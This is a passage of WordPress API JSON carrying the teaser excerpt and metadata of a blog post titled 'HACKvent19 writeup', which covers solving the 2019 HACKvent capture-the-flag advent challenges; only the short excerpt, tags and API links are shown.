hosted on the brand new Hacking-Lab 2.0 
platform. Each day from the 1st of December until the 24th a new challenge is published, rising in difficulty. The flag format changed from HV18-xxxx-xxxx-xxxx-xxxx-xxxx to HV19{&#8230;}. In the end I managed to solve all 28 challenges \ud83d\ude42 Hidden HV19.H1 Hidden OneHV19.H2 Hidden TwoHV19.H3 Hidden &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=1663\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;HACKvent19 writeup&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[47,16,15,38,12,19,14],"class_list":["post-1663","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-debugging","tag-hacking-lab","tag-hackvent","tag-python","tag-reversing","tag-x64","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1663"}],"version-history":[{"count":71,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663\/revisions"}],"predecessor-version":[{"id":1864,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663\/revisions\/1864"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1663"},{"taxonomy":"post_tag"
,"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}